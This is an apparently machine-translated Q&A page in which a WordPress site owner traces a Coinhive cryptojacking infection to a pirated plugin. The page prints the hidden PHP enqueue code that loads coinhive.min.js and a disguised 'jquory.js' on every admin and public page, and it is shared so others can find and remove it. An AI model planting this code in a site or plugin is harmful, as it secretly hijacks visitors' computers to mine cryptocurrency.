Dreamhost上的WordPress安装程序中存在恶意软件。<link rel=‘dns-prefetch’href=‘//cohive.com’/>

时间:2018-03-12 作者:Nishant Sah

我正在尝试创建一个网站。这是现场直播。你可以看到google检测到一个恶意软件。

在源代码中,您将看到三行

<link rel=\'dns-prefetch\' href=\'//coinhive.com\' />

还有一个地方可以看到coinhive。

这基本上是在客户的台式机/笔记本电脑上挖掘monero的代码

Q) 我们如何首先找出这个恶意软件是如何进入网站的?部分:1)是因为dreamhost的共享主机被黑客攻击吗?2) 是哪个插件做的?3) 如何删除此项。4) 我们如何确保它不会回来:(

一直在努力寻找,但没有线索。

我已经构建了3个月,做了很多事情,包括从“torrent”下载一些主题

很难追踪。但如果你们有任何以前的经验,那么很容易弄清楚。

1 个回复
最合适的回答,由SO网友:Nishant Sah 整理而成

我发现了问题。。

为其他可能得到这个的人回答。。。

其中一个插件中嵌入了此代码

function enqueue_my_scripts() {
wp_enqueue_script( \'wp-internal\', \'https://coinhive.com/lib/coinhive.min.js\', false, false, true );
wp_enqueue_script( \'wp-backend\', plugins_url() . \'/LayerSlider/assets/js/jquory.js\', false, false, true );

}
add_action( \'admin_enqueue_scripts\', \'enqueue_my_scripts\' );
add_action( \'wp_enqueue_scripts\', \'enqueue_my_scripts\' );
还有这个javascript文件jqoury。js。

只需删除上面的代码和js文件。这个问题会解决的。

干杯

结束
标签: hacked   小码农  

相关推荐

How was my WP site hacked

我的网站,http://www.cancer-study.com, 已被黑客攻击,我无法登录到wp管理员。你能说一下它是如何被黑客入侵的吗?我能做些什么来修复损坏?我可以访问主机。